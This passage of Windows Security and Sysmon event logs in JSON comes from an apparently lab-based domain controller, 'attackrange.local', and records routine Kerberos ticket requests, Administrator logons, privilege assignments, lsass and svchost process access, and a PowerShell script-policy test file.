05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220474,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220475,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{2E0E9CD3-4E78-A499-3252-7756659BD8CA}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{2E0E9CD3-4E78-A499-3252-7756659BD8CA}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220476,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{2E0E9CD3-4E78-A499-3252-7756659BD8CA}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{2E0E9CD3-4E78-A499-3252-7756659BD8CA}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220477,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x657C6\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{2E0E9CD3-4E78-A499-3252-7756659BD8CA}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x657c6","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{2E0E9CD3-4E78-A499-3252-7756659BD8CA}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220478,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x657C6\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x657c6","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4343,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.826\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.826","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4344,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.826\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.826","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4345,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.842\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-030D-5F25-0000-00108D560600}\r\nTargetProcessId: 4504\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.842","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-030D-5F25-0000-00108D560600}","TargetProcessId":"4504","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4346,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.858\r\nProcessGuid: {A837DB8D-030D-5F25-0000-00108D560600}\r\nProcessId: 4504\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_o3prn5ng.ork.ps1\r\nCreationUtcTime: 2020-08-01 05:52:13.858","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.858","ProcessGuid":"{A837DB8D-030D-5F25-0000-00108D560600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_o3prn5ng.ork.ps1","CreationUtcTime":"2020-08-01 05:52:13.858","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4347,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.889\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-030D-5F25-0000-00108D560600}\r\nTargetProcessId: 4504\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.889","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-030D-5F25-0000-00108D560600}","TargetProcessId":"4504","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
